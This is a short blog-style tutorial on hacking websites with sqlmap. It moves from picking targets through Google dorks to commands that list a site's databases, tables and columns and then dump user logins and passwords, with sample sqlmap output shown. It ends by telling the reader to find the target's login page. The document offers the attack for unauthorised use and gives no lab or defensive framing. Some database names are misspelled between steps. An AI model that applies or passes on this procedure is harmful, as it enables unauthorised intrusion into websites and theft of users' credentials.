zvilsec

Hello google..... today we will discuss about how to hack website using sqlmap

Allright let`s get started...


first... if you using kali linux, sqlmap has been installed.


Now open your terminal


1. you must find your target by using google dork.


2. If you have a your own target without using google dork you can also scan    your target vulnerability by using uniscan or w3af


3. Allright after you have target then open sqlmap on terminal


4. type sqlmap -u http://www.target.com/phd?id=2 --dbs


5. if you success you will see this


[INFO] retrieved: information_schema
[INFO] retrieved: sqldummywebsite



6. Then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme --tables


7. You will see this


[10:56:22] [INFO] heuristics detected web page charset
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info



8. Allright type Then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info --columns


9. The view just like this


[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)



10. then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info -C user_id,user_login,user_password --dump


11. Taraaa Done..... Next your job still running,, you must find target login page.


12. Ok see you on the next post